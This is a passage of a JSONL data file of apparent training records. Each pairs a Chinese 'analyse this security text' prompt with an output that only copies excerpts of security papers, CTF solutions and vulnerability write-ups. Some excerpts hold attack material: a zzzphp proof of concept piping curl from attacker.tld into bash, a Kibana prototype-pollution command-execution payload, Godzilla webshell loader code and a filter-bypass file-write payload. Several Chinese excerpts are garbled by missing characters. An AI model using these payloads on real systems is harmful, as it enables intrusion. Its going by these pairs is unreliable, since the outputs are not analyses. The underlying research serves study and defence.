2011年的病毒木马传播更加依赖互联网通道依 靠下载包括浏览器下载和聊天工具传送的病 毒达到86.4%通过网页挂马等形式比以前大大减 少  比如前段时间的 PuTTYWinSCP和SSH Secure工具 汉化版被人植入后门导致大量服务器落入黑客 手中 17 威胁三下载威胁  一个完整的下载安全解决方案应该包括 a. 下载前拦截 下载前预先收集了可疑的下载URL不用扫描文件 即可通过URL进行拦截用户不用经历下载过程 b. 下载后拦截 通过扫描下载后的文件进行拦截 18 威胁三下载威胁  为什么要下载后拦截 a. 基于云的URL收集未必是最及时的 b. 一次一变的下载链接 我们要让每个用户都不是那个最倒霉的用户 19 威胁三下载威胁  下载后拦截技术 文件 解压脱壳 金山云特征查询 金山本地启发式引擎 白 白 允许访问 禁止访问 黑 黑 20 威胁三下载威胁  DEMO 21 威胁三下载威胁 22 威胁三下载威胁 23 威胁三下载威胁  浏览器带一个扫描引擎将下载的文件抽取特征 提交给云服务器查询安全性 24 威胁四网购威胁  在网购过程中除了网页钓鱼威胁外越来越多 的是在客户端环境不安全情况下网页遭篡改 键盘被监听的问题 25 威胁四网购威胁  解决方案 支付前网购环境扫描 网购过程中阻止未知程序执行 网购过程中阻止未知驱动加载 网购过程中阻止注入浏览器 网购过程中阻止篡改浏览器页面 网购过程中阻止网页键盘记录 26 威胁四网购威胁 27 威胁四网购威胁 28 威胁四网购威胁 29 威胁四网购威胁 30 国内浏览器的安全现状  普遍不重视安全问题  真正冠以安全浏览器名称的只有 360安全浏览器 猎豹浏览器  而360安全浏览器真正的安全功能仅只是网址拦截 31 猎豹浏览器  携着对浏览器安全的认识和思考我们推出了猎 豹浏览器  猎豹浏览器拥有业界最全面的安全防护体系BIPS: Browser Intrusion Prevention System  结合金山多年积累的 云安全 以及 K+ 防御  全面解决大陆浏览器的安全威胁问题  猎豹浏览器的安全防御组成 32 33  猎豹浏览器同时还是全球首个敢赔浏览器 只要使用猎豹浏览器上网就可以享受敢赔服务 并获得1000元的敢赔基金倘若网购时被盗 就可以从基金中获取单笔最高500元的现金赔付 34", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nANTI-VIRUS ARTIFACTS III // By ethereal__vx 1 Antivirus Artifacts III Table of Contents Topic Page Introduction 3 Avira 4 - 7 F-Secure 8 - 10 Norton 11 - 15 TrendMicro 16 - 18 WebRoot 19 - 22 BitDefender 23 - 27 MalwareBytes 28 - 30 Adaware 31 - 32 AVAST 33 - 37 Dr. Web 38 - 40 Kaspersky 41 - 43 Conclusion 44 2 Antivirus Artifacts III Welcome to Antivirus Artifacts III. The Antivirus Artifacts series so far has focused exclusively on mnemonic artifacts: drivers, API hooks, or processes which may be present. This third entry identifies registry artifacts from the AV product as well as services. New AVs have been added to the collection: Adaware, Dr. Web, AVAST , Kaspersky. Note: due to the size of the registry artifacts retrieved they will not be listed in this paper. Registry dumps for HKEY_LOCAL_MACHINE, HKEY_CURRENT_CONFIG, HKEY_CLASSES_ROOT, HKEY_USERS, and HKEY_CURRENT_USER can be viewed on my GitHub. https://github.com/D3VI5H4/Antivirus-Artifacts/tree/main/Registry%20Data Summary of Antivirus Artifacts I: The most common method to determine if an anti-virus product or EDR system is in place is using the WMIC and performing a basic query against the Windows Security Center namespace. wmic /node:localhost /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed courtesy of Sam Denty from StackOverflow This method will work in most scenarios. The problem presented here is that this will only return a string if the anti-virus product, or the EDR system, has chosen to register itself in the Windows Security Center namespace. If the product has not registered itself this query will fail. Knowing we are dependent on a security product to register itself I have decided to go down a different path. Summary of Antivirus Artifacts II: This release is to act as an amendment to the original paper by diving deeper into antivirus products and their operations by documenting drivers loaded into the Wi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBackdooring the Lottery and Other Security Tales from Gaming July 30, 2017 Gus Fritschie and Evan Teitelman Presentation Overview 1. Introductions 2. What has happened since 2011 3. Historical overview of security incidents in gaming 4. Eddie Tipton and the lottery 5. Russian slot attacks 6. Conclusion  SeNet International Corp. 2017 3 July 2017 SeNet Who We Are  SeNet International  SeNet International Corp. 2017 4 July 2017 SeNet Who We Are  Gus Fritschie Gus Fritschie has been involved in information security since 2000. About 5 years ago (after his previous DEF CON presentation on iGaming security) he transitioned a significant portion of his practice into the gaming sector. Since then he has established himself and SeNet as the IT security leader in gaming. He has supported a number of clients across the gaming spectrum from iGaming operators, land-based casinos, gaming manufacturer, lotteries, tribal gaming, and daily fantasy sports. @gfritschie  SeNet International Corp. 2017 5 July 2017 SeNet Who We Are  Evan Teitelman Evan works and lives in the Washington DC area. He is the founder of BlackArch Linux and specializes in reverse engineering and secure application development. In his free time he enjoys hiking, climbing, and working on his van.  SeNet International Corp. 2017 6 July 2017 SeNet Evans Van  SeNet International Corp. 2017 7 July 2017 SeNet What this talk is and is not  SeNet International Corp. 2017 8 July 2017 SeNet What has happened since 2011  SeNet International Corp. 2017 9 July 2017 SeNet iGaming Legislation  SeNet International Corp. 2017 10 July 2017 SeNet Highlighted Security Incidents in Gaming Since 2011 None of these will be discussed in detail but are listed to illustrate that this sector is not immune to these threats. Only a small sampling.  Las Vegas Sands hack  NJ iGaming DDOS attacks  Affinity Gaming breach  Hard Rock Hotel & Casino data breach  Casino Rama Resort in Ontario  Peppermill Resort Spa Casino in Reno credit card brea", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nset === 显示或设置shell特性及shell变量 ## 补充说明 **set命令** 作用主要是显示系统中已经存在的shell变量以及设置shell变量的新变量值使用set更改shell特性时符号\"+\"和\"-\"的作用分别是打开和关闭指定的模式set命令不能够定义新的shell变量如果要定义新的变量可以使用declare命令以`变量名=值`的格式进行定义即可 ### 语法 ```shell set(选项)(参数) ``` ### 选项 ```shell -a标示已修改的变量以供输出至环境变量 -b使被中止的后台程序立刻回报执行状态 -C转向所产生的文件无法覆盖已存在的文件 -dShell预设会用杂凑表记忆使用过的指令以加速指令的执行使用-d参数可取消 -e若指令传回值不等于0则立即退出shell -f取消使用通配符 -h自动记录函数的所在位置 -H Shell可利用\"!\"加<指令编号>的方式来执行history中记录的指令 -k指令所给的参数都会被视为此指令的环境变量 -l记录for循环的变量名称 -m使用监视模式 -n只读取指令而不实际执行 -p启动优先顺序模式 -P启动-P参数后执行指令时会以实际的文件或目录来取代符号连接 -t执行完随后的指令即退出shell -u当执行时使用到未定义过的变量则显示错误信息 -v显示shell所读取的输入值 -x执行指令后会先显示该指令及所下的参数 ``` ### 参数 取消某个set曾启动的参数 ### 实例 使用declare命令定义一个新的环境变量\"mylove\"并且将其值设置为\"Visual C++\"输入如下命令 ```shell declare mylove='Visual C++' #定义新环境变量 ``` 再使用set命令将新定义的变量输出为环境变量输入如下命令 ```shell set -a mylove #设置为环境变量 ``` 执行该命令后将会新添加对应的环境变量用户可以使用env命令和grep命令分别显示和搜索环境变量\"mylove\"输入命令如下 ```shell env | grep mylove #显示环境变量值 ``` 此时该命令执行后将输出查询到的环境变量值", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Kibana 原型链污染导致任意代码执行漏洞 (CVE-2019-7609) Kibana 为 Elassticsearch 设计的一款开源的视图工具其5.6.15和6.6.1之前的版本中存在一处原型链污染漏洞利用这个漏洞我们可以在目标服务器上执行任意JavaScript代码 参考链接 - https://nvd.nist.gov/vuln/detail/CVE-2019-7609 - https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/ - https://slides.com/securitymb/prototype-pollution-in-kibana/#/4 ## 漏洞环境 启动环境前需要先在Docker主机上执行如下命令修改`vm.max_map_count`配置为262144 ``` sysctl -w vm.max_map_count=262144 ``` 之后执行如下命令启动Kibana 6.5.4和Elasticsearch 6.8.6 ``` docker compose up -d ``` 环境启动后访问`http://your-ip:5601`即可看到Kibana页面 ## 漏洞复现 原型链污染发生在Timeline页面我们填入如下Payload ``` .es(*).props(label.__proto__.env.AAAA='require(\"child_process\").exec(\"/bin/touch /tmp/success\");process.exit()//') .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ') ``` ![](1.png) 成功后再访问Canvas页面触发命令`/bin/touch /tmp/success`可见`/tmp/success`已成功创建 ![](2.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSecuring Windows Internet Servers 23.org / Covert Systems jon.miller@covertsystems.net Jon Miller Senior Security Engineer Covert Systems, Inc. Always try to use a fresh install and migrate existing data over Make sure to convert to NTFS Default Security Settings are not applied You must apply them manually using MMC Upgrading? Installation Service Packs Always check windows update and TechNet to make sure you have the most current patches and SPs HFNETCHK Installation NTFS or FAT File Systems Always decide what services you require prior to installation Now is the time to decide what form of remote administration software, if any you will use Terminal Server Vshell SSH & SFTP (www.vandyke.com) Services Never install superfluous services COMPAQ INSTALLATION = Services TCP/IP should be the only protocol Use TCP/IP Filtering (and IPSec when applicable) Nmap the server to make sure you dont have any surprise ports open If it is an IIS box it can NEVER be on a domain Use second Ethernet card for remote admin and have only the Internet Service on the primary interface Network Configuration Customize your own security template and use it Establish standards within your template that apply to all servers from PDCs to desktops Using the MMC Password Complexity / Length Event Log Access  Always remember passwords so they cannot be reused Define Permissions for Services Rename Administrator Account Security Configuration Delete or rename files that may be used against you in the event of an attack Create partitions or move directory structure to protect against directory transversal  Do you really use MS TFTP? Remove OWA Do you really want an IIS server running on your companies Mail server?  Rename CMD.exe Microsoft Security Alerts microsoft.com/technet/security/notify.asp Common Sense IIS 4 / 5 Try to run only base services The services below are the only services required to run a functional IIS server: Event Log License Logging Service Windows NTLM Security Support Provid", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n写了好久的文章放出来吧 前言 注入内存马借助当前的webshell工具而言冰蝎可以通过创建hashmap放入requestresponse session替换pagecontext来解决 HttpSession session = lastRequest.getSession(); pageContext.put(\"request\", lastRequest); pageContext.put(\"response\", lastResponse); pageContext.put(\"session\", session); 能这么写的原因是因为冰蝎做了处理 会从传入的obj中分别取到requestresponsesession 而哥斯拉没有这么做如何破局 哥斯拉连接分析 哥斯拉是基于动态加载class字节码实现的webshell工具 先看一下jsp的shell <%! String xc = \"3c6e0b8a9c15224a\"; String pass = \"pass\"; String md5 = md5(pass + xc); class X extends ClassLoader { public X(ClassLoader z) { super(z); } public Class Q(byte[] cb) { return super.defineClass(cb, 0, cb.length); } } ....省略加密解密的函数.... %> <% try { byte[] data = base64Decode(request.getParameter(pass)); data = x(data, false); if (session.getAttribute(\"payload\") == null) { session.setAttribute(\"payload\", new X(this.getClass().getClassLoader()).Q(data)); } else { request.setAttribute(\"parameters\", data); java.io.ByteArrayOutputStream arrOut = new java.io.ByteArrayOutputStream(); Object f=((Class)session.getAttribute(\"payload\")).newInstance(); f.equals(arrOut); f.equals(pageContext); response.getWriter().write(md5.substring(0, 16)); f.toString(); response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true))); response.getWriter().write(md5.substring(16)); } } catch (Exception e) { } %> 先判断session中payload是否为空如果为空就用classloader加载解密之后的字节码data 如果不为空将data赋值到session的parameters参数然后从session中拿到定义的payload类创 建实例再进行了两次equals和一次tostring两次equals分别传入ByteArrayOutputStream和 pageContext 通过bp代理看一下测试连接的过程 点完测试连接后bp多了两个请求 再点success的确定按钮后又多了一个请求 一共三个请求这三个请求分别干了什么 为了调试我们需要反编译哥斯拉源码找到 godzilla\\shells\\payloads\\java\\assets\\payload.classs 文件反编译回来后在idea项目中创建一 个payload类将源码粘贴进去另外还需要关闭idea的自动tostring 然后修改jsp让其加载我们自己的payload.class而非从session中加载 <% try { byte[] data = base64Decode(request.getParameter(pass)); data = x(data, false); if (session.getAttribute(\"payload\") == null) { session.setAttribute(\"payload\", new X(this.getClass().getClassLoader()).Q(data)); } else { request.setAttribute(\"parameters\", data)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTodays Session ! Design failures in embedded systems ! Examples of design failures ! Exploiting a design failure ! Software vulnerabilities in embedded systems ! Examples software vulnerabilities ! Exploiting a common embedded system Design failures ! Undocumented functionality ! Developer backdoors ! Auto-something features ! Legacy functions ! Ignored standards ! Uncontrolled increase of complexity ! New subsystems ! Additional access methods ! Inconsistent access restrictions Design failures Case 1: Lucent Brick ! Layer 2 Firewall running Inferno OS ! ARP cache design failures ! ARP cache does not time out ! ARP reply poisoning of firewall ! ARP forwarded regardless of firewall rules LSMS Management Server DMZ ARP reply with LSMS IP Design failures Case 2: Ascend Router ! Undocumented discovery protocol ! Special packet format to UDP discard port ! Leaks information remotely ! IP address/Netmask ! MAC address ! Serial number ! Device type ! Features ! Can set IP address using SNMP write community Exploiting a design failure: Exploiting a design failure: HP Printers HP Printers ! Various access methods: ! Telnet,HTTP,FTP,SNMP,PJL ! Various access restrictions ! Admin password on HTTP and Telnet ! IP access restriction on FTP, PJL, Telnet ! PJL security password ! Inconsistent access restriction interworkings ! SNMP read reveals admin password in hex at .iso.3.6.1.4.1.11.2.3.9.4.2.1.3.9.1.1.0 ! HTTP interface can be used to disable other restrictions (username: laserjet) HP Printers: PJL ! PJL (Port 9100) allows access to printer configuration ! Number of copies, size, etc. ! Locking panel ! Input and output trays ! Eco mode and Power save ! I/O Buffer ! Security relies on PJL password ! key space of 65535. ! max. 6 hours for remote brute force HP Printers: PJL ! PJL (Port 9100) allows access to printer file systems on DRAM and FLASH ! Spool directory contains jobs ! PCL macros on printer ! More file system content (later models) ! Firmware ! Web server content ! S", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDEF CON 19: Getting SSLizzard Nicholas J. Percoco  Trustwave SpiderLabs Paul Kehrer  Trustwave SSL Copyright Trustwave 2011 Agenda  Introductions  Primer / History: SSL and MITM Attacks  Mobile SSL User Experience  Research Motivations  Research Implications  Data Transmission Assault Course Components  Introducing SSLizzard  Mobile App Test Results  Conclusions Copyright Trustwave 2011 Introductions Who are we? Nicholas J. Percoco (c7five)  Head of SpiderLabs at Trustwave  Started my InfoSec career in the 90s Paul Kehrer (reaperhulk)  Lead SSL Developer at Trustwave  Enjoys baking cakes in spare time. Copyright Trustwave 2011 Introductions Whats this talk about?  De-evolution of User Security Experience (in Mobile Devices)  History and Types of SSL Attacks  Lack of Testing Tools for Mobile Applications  How Various App and Devices Perform Under SSL Stress  A Tool Release to Help Solve this Problem Copyright Trustwave 2011 Primer / History: SSL and MITM Attacks What is SSL?  Stands for Secure Sockets Layer  Developed by Netscape in 1994  Implemented in Netscape Navigator 1.0  A protocol to secure a client->server data transmission  Uses Asymmetric Keys to establish a Symmetric Key  This happens during a handshake before actual data is transmitted Copyright Trustwave 2011 Primer / History: SSL and MITM Attacks  Where is SSL (certs) Used?  To Establish Secure Client to Server Communication  Client Identity (User Authentication)  Application Signing  Log File Integrity Copyright Trustwave 2011 Primer / History: SSL and MITM Attacks  How is SSL used in Mobile Devices?  To Secure Communication Over Public Networks  To Establish App to Server Communication  App Code Signing (Android, IOS, BlackBerryOS)  Mobile Device Management Profiles (Signed) Copyright Trustwave 2011 Primer / History: SSL and MITM Attacks  What is a Man-in-the-Middle Attack?  Injecting an Attacker between a Client and a Server Session.  Attacker intercepts Client request to Server  Attacker established", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n某运维审计系统任意件写漏洞挖掘过程 分享下最近挖掘漏洞的些段 临近实习有有佬收实习弟端茶倒样样精通 标系统如下: 是个安全审计系统根据主的关键词在络安全产品全中进查询得知标系统开发商为州某科 `络安全产品全`:https://t.wangan.com/c/products.html 同时通过搜索引擎查到了些历史漏洞 本以为可以直接拉出payload出来打呢但是看了下前所遇到的系统版本为3.*最新版乌云所存储的时间居然是2011年 这明显对不上了且新版使的mvc模式直接略过 既然没有可利的公开漏洞那么只有挖掘漏洞了还是法通过fofa采集了波相同程序的站点准备探测下弱令 进去挖些未授权的漏洞 测了个站点都没有个成功的卒 因为这类系统般都是采的iso镜像件或者安装包既然知晓了开发商以及产品版本号那么可以直接去找下镜像或者安装 包脱取源码进审计 百度云件搜索引擎:https://www.lingfengyun.com/ 根据筛选发现了某户在19年分享过这类系统的操作档将其下载下来发现档中包含了openstack以及docker的安装法 由于openstack需要环境本机没有配置所以这我简单看了看docker的安装法 docker pull 的是个私有仓库但是这可以注意下docker在push的时候般是以户名/镜像名般在知道户名的情况下 可以尝试去搜索些镜像在安装档中pull的地址为*nsec.com 尝试使docker search xxxnsec 搜索 这有两个镜像个是geteway,个是web firewall但是当我尝试下载的时候 去dockerhub上看了下 并没有内容应该是被清空了可惜啊 既然分享过操作档肯定会有安装包 直接切该户的详细信息并且筛选zip,rar等压缩件最终以确定个结尾为V3.7的zip压缩包 将其下载到本地解压出来为iso镜像件 开始Vmware搭建环境 根据相关提示,开始安装程序 安装完过后,提示输账户和密码 由于解压出来的件并没有安装档在历史分享中也并没有找到类似件盲测了个弱令发现都不 这想到了忍者师傅前段时间发过篇章也是在不知道标主机账户密码的情况下读取系统件 在本地新建了个centos7系统添加块现有虚拟磁盘磁盘件选择运维审计系统的vmdk件 开启centos7系统查看硬盘以及分区信息 1 sudo fdisk -l 可以看到这多了个sdb2这就是刚刚添加的现有虚拟磁盘也就是运维审计系统的磁盘 将其挂载 因为标程序是使php开发的这直接find查找下 找到对应路径 直接tar 打包整个件夹拖出来源码到 开始审计 由于是MVC模式直接找Controller 在indexController下发现某法存在调file_put_centents()函数 且参数可控并且在第三调了file_put_centents可造成任意件写 cert为内容username由于是在末尾拼接可以直接../跨录 准备写个phpinfo进去测试下可执性 发现写的件内容被替换了经过系列测试发现只要出现<>; '\"就会在该字符前加个\\ 由于\\的写导致php代码语法错误不能被执这想到了php的特性 链接https://blog.csdn.net/chengjianghao/article/details/100078052 加结尾的之后的内容视为 纯本直接输出直到再次碰到 <? 或 <?php 不加的之后的内容视为 PHP 代码除没有代码了 不加结尾并不影响php代码的执如果传<?php phpinfo(); 那么最终格式为 \\<?php phpinfo()\\;  这的;最终也被替换了导致语句还是法正常执这请教了群的师傅 在1师傅的指导下获得了最终的payload: <?php if(expr) 在php中 if是以{}作为结尾 同理使while也是可以的", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2016 Check Point Softw are Technologies Ltd. All rights reserved | P. 1 INTRODUCTION The cloak-and-dagger of cybercrime makes for entertaining theater. Thats especially true for sensational breaches often caused by malware or other sophisticated attacks. Behind the drama though are some inherent vulnerabilities making these attacks possible. A myriad of device models, operating system versions, and unique software modifications makes handling Android vulnerabilities a challenge. The earlier these vulnerabilities are born in the supply chain, the more difficult they are to fix. Fixes require mind-bending coordination between suppliers, manufacturers, carriers and users before patches make it from the drawing board to installation. The fragmented world of Android leaves many users exposed to risk, even with out-of-the-box devices. In this report, the research team details four newly-discovered vulnerabilities affecting over 900 million Android smartphones and tablets. If exploited, each of these can give attackers complete control of devices and access to sensitive personal and enterprise data on them. QUADROOTER QuadRooter is a set of four vulnerabilities affecting Android devices built on Qualcomm chipsets. The worlds leading designer of LTE chipsets, Qualcomm owns a 65% share of the LTE modem baseband market.1 1 ABI Research: https://www.abiresearch.com/press/abi-research-reports-qualcomm-maintains-clear-lead/ QUADROOTER NEW VULNERABILITIES AFFECTING OVER 900 MILLION ANDROID DEVICES by the Check Point Research Team 2016 Check Point Software Technologies Ltd. All rights reserved. | 2 WHAT IS ROOTING? Rooting enables administrative control of a device and allows apps to run privileged commands not usually available on factory-configured devices. An attacker can use these commands to perform operations like changing or removing system-level files, deleting or adding apps, as well as accessing hardware on the device, including the touchscreen, camera, microphone, and o", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Crypto 300 (crypto, 300p) ### PL [ENG](#eng-version) Bardzo ciekawe zadanie dla nas, musieliśmy sporo z nim powalczyć, ale w końcu udało się rozwiązać zagadkę szyfru. Otóż dostajemy taki szyfr: 320b1c5900180a034c74441819004557415b0e0d1a316918011845524147384f5700264f48091e45 00110e41030d1203460b1d0752150411541b455741520544111d0000131e0159110f0c16451b0f1c 4a74120a170d460e13001e120a1106431e0c1c0a0a1017135a4e381b16530f330006411953664334 593654114e114c09532f271c490630110e0b0b Oraz kod którym go zaszyfrowano (w wersji przepisanej przez nas do pythona, nie jesteśmy fanami PHP): def encrypt(plainText): space = 10 cipherText = \"\" for i in range(len(plainText)): if i + space < len(plainText) - 1: cipherText += chr(ord(plainText[i])  ord(plainText[i + space])) else: cipherText += chr(ord(plainText[i])  ord(plainText[space])) if ord(plainText[i]) % 2 == 0: space += 1 else: space -= 1 return cipherText Bardzo komplikuje wszystko ta ruszająca się space. Ale jej stan zależy tylko od najniższego bitu, co wykorzystaliśmy przy rozwiązywaniu zadania. Rozwiązywaliśmy je w dwóch częściach - najpierw odzyskaliśmy najniższe bity plaintextu, a później dopiero całe hasło. Pierwsza próba złamania najniższych bitów wyglądała tak: def verify(cipherText, guessedBits): space = 10 for i in range(len(guessedBits)): if i + space < len(cipherText) - 1: if i + space >= len(guessedBits): return True if (ord(cipherText[i]) & 1) != ((ord(guessedBits[i]) & 1)  (ord(guessedBits[i + space]) & 1)): return False else: if space >= len(guessedBits): return True if (ord(cipherText[i]) & 1) != ((ord(guessedBits[i]) & 1)  (ord(guessedBits[space]) & 1)): return False if guessedBits[i] == '0': space += 1 else: space -= 1 return True def decrypt(cipherText, guessedBits, i): if i >= len(cipherText): print 'ok:', guessedBits return if len(guessedBits) == 10: print (int(guessedBits, 2) / 1024.0) * 100, '%' if verify(cipherText, guessedBits): decrypt(cipherText, guessedBits + '0', i + 1) decrypt(cipherText, guessedBi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPOC分析 分析POC可得到以下信息 1. 漏洞点由Cookie触发Cookie值为 keys 2. Payload像是一个if标签猜测可能为模板注入 3. 请求参数为 ?location=search猜测可能是个路由 漏洞分析 复现环境为zzzphp v2.0.3 从 /index.php 找起跟踪到 inc/zzz_client.php 搜索 location 关键字接着找到这么一段代 码 查看模板文件 /template/pc/cn2016/html/search.html 发现了Poc中的 keys curl -b 'keys={if:=`curl http://attacker.tld/poc.sh|bash`}{end if}' 'http://target.tld/?location=search' 1 //只要get传递了locationgetlocation()就返回$_GET['location'] $location=getlocation(); switch ($location) { ...... case 'search': //设置路径 //TPL_DIR = /template/pc/cn2016/html $tplfile= TPL_DIR . 'search.html'; break; ...... } ..... //对$tplfile进行file_get_contents() //$zcontent为模板内容 $zcontent = load_file($tplfile,$location); $parser = new ParserTemplate(); //解析模板 $zcontent = $parser->parserCommom($zcontent); echo $zcontent; 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 ...... <title>关键词{zzz:keys}搜索结果-{zzz:sitetitle}</title> ...... 1 2 3 跟进 parserCommom() 方法该方法会进行标签解析不过在这个漏洞中仅需关注 parserlocation() 和 parserIfLabel() 即可可以注意下 parserIfLabel() 的调用在 parserlocation() 之后这个调用顺序是该漏洞的成因之一  首先分析 parserlocation() 方法该方法又调用了 parserSearch() 方法关键代码如下 public function parserCommom( $zcontent ) { $zcontent = $this->parserSiteLabel( $zcontent ); // 站点标签 $zcontent = $this->ParseInTemplate( $zcontent ); // 模板标签 $zcontent = $this->parserConfigLabel( $zcontent ); //配置表情 $zcontent = $this->parserSiteLabel( $zcontent ); // 站点标签 $zcontent = $this->parserNavLabel( $zcontent ); // 导航标签 $zcontent = $this->parserCompanyLabel( $zcontent ); // 公司标签 $zcontent = $this->parserUser( $zcontent ); //会员信息 //parserlocation() $zcontent = $this->parserlocation( $zcontent ); // 站点标签 $zcontent = $this->parserLoopLabel( $zcontent ); // 循环标签 $zcontent = $this->parserContentLoop( $zcontent ); // 指定内容 $zcontent = $this->parserbrandloop( $zcontent ); $zcontent = $this->parserGbookList( $zcontent ); $zcontent = $this->parserLabel( $zcontent ); // 指定内容 $zcontent = $this->parserPicsLoop( $zcontent ); // 内容多图 $zcontent = $this->parserad( $zcontent ); $zcontent = parserPlug", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Finally - home! (5/5) Category: Innovation ## Description > https://s3.us-west-2.amazonaws.com/cyber-ctf.be/chl5/9f2d4057-618a-4016-a854-e6ed23d30b21.html ## Solution We visit the attached website and get a form titled \"Ready to Land?\": ```html <form id=\"form\"> <div class=\"form__group field\"> <input type=\"input\" class=\"form__field\" placeholder=\"Answer\" name=\"answer\" id='answer' required /> <label for=\"answer\" class=\"form__label\">Answer</label> </div> </form> ``` Behind the scenes, the logic is handled by a WebAssembly script: ```javascript const memory = new WebAssembly.Memory({ initial: 256, maximum: 256 }); const importObj = { env: { abortStackOverflow: () => { throw new Error('overflow'); }, table: new WebAssembly.Table({ initial: 0, maximum: 0, element: 'anyfunc' }), __table_base: 0, memory: memory, __memory_base: 1024, STACKTOP: 0, STACK_MAX: memory.buffer.byteLength, } }; document.getElementById('form').addEventListener('submit', function(e) { e.preventDefault(); (async () => { const buff = new Uint8Array([ 221, 188, 174, 176, 220, 221, 221, 221, 220, 245, 223, 189, 220, 162, 221, 189, 194, 162, 162, 162, 162, 162, 162, 162, 162, 162, 162, 162, 162, 162, 162, 162, 162, 162, 162, 162, 162, 162, 162, 162, 162, 162, 162, 162, 162, 162, 162, 162, 220, 162, 223, 190, 216, 222, 184, 179, 171, 207, 188, 191, 178, 175, 169, 142, 169, 188, 190, 182, 146, 171, 184, 175, 187, 177, 178, 170, 221, 221, 222, 184, 179, 171, 208, 130, 130, 176, 184, 176, 178, 175, 164, 130, 191, 188, 174, 184, 222, 162, 221, 222, 184, 179, 171, 209, 130, 130, 169, 188, 191, 177, 184, 130, 191, 188, 174, 184, 222, 162, 221, 222, 184, 179, 171, 219, 176, 184, 176, 178, 175, 164, 223, 220, 93, 223, 93, 223, 222, 184, 179, 171, 216, 169, 188, 191, 177, 184, 220, 173, 220, 221, 221, 222, 223, 220, 220, 219, 202, 222, 162, 220, 156, 125, 205, 214, 162, 220, 156, 125, 77, 29, 223, 214, 160, 220, 158, 221, 221, 221, 221, 214, 218, 213, 220, 217, 130, 171, 184, 175, 221, 220, 215, 59, 199, 220, 62, ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTruman Kain TEVORA Your Lookout on Autopilot Surveillance Detection TL;DR Autopilot cameras are good for a lot more than driving. So are Teslas. Why Tesla? Three Cameras Built In* Detailed Vehicle/Owner API Sentry Mode (Always On) In-Car Web Browser Surveillance Detection Scout Real-Time License Plate Recognition Real-Time Familiar Face Detection Recon/Pattern of Life Querying Open-Source & Locally Deployed Real-Time Defined Inference starts as soon as an mp4 hits disk* Counter-Surveillance Scenarios While Parked: Which cars/people are loitering near my house/car? During Your Drive: How long has that car been behind me? Have I seen that car before? Recon Query Scenarios Tailgating: What time does my target arrive/leave the office? Lockpicking: How often does security make rounds? At what hours is the building empty? Web Stack Vue.js Express CV Stack Hardware Options Pi Zero W $10 Pi 4B (4GB RAM) $55 Jetson Nano $100 Jetson Xavier $700 Hardware Benchmarks Pi Zero W 0 8 15 23 30 Average Inference FPS Pi 4B/G Jetson Nano Jetson Xavier DEMO Whats Next? Remote Live* View 3rd Party Dashcams Gait Recognition More Object Detection [Your Request Here] Privacy Implications Amount of actionable surveillance data will skyrocket Private corporations and governments want it Breaches will expose it (Of the self-driving future) Truman Kain TEVORA Your Lookout on Autopilot Thank you! threat.tevora.com/scout", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# electron 远程命令执行漏洞CVE-2018-1000006 Electron是由Github开发用HTMLCSS和JavaScript来构建跨平台桌面应用程序的一个开源库 Electron通过将Chromium和Node.js合并到同一个运行时环境中并将其打包为MacWindows和Linux系统下的应用来实现这一目的 在Windows下如果Electron开发的应用注册了Protocol Handler允许用户在浏览器中召起该应用则可能出现一个参数注入漏洞并最终导致在用户侧执行任意命令 参考链接[Electron < v1.8.2-beta.4 远程命令执行漏洞CVE-2018-1000006](https://xianzhi.aliyun.com/forum/topic/1990) ## 编译APP 执行如下命令编译一个包含漏洞的应用 ``` docker compose run -e ARCH=64 --rm electron ``` 上述命令中因为软件需要在Windows平台上运行所以需要设置ARCH的值为平台的位数32或64 编译完成后再执行如下命令启动web服务 ``` docker compose run --rm -p 8080:80 web ``` 此时访问`http://your-ip:8080/`即可看到POC页面 ## 复现漏洞 首先在POC页面点击第一个链接下载编译好的软件`vulhub-app.tar.gz`下载完成后解压并运行一次 ![](1.png) 这一次将注册Protocol Handler 然后再回到POC页面点击第二个链接将会弹出目标软件和计算器 ![](2.png) > 如果没有成功可能是浏览器原因经测试新版Chrome浏览器点击POC时会召起vulhub-app但不会触发该漏洞", "category": "text_analysis", "source": "security_papers"}
